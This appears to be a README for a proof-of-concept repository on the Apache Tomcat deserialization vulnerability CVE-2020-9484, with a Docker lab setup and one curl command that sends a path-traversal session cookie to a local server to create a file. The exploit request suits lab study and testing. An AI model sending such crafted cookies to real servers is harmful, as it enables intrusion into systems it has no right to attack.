ColdFusionX/CVE-2020-9484

POC - Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)

Java

Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)

Vulnerable target setup

Clone this repository
Run docker-compose up -d
That's it !

Exploit POC

Run curl -v 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/cfx

File named coldfx gets created in tmp directory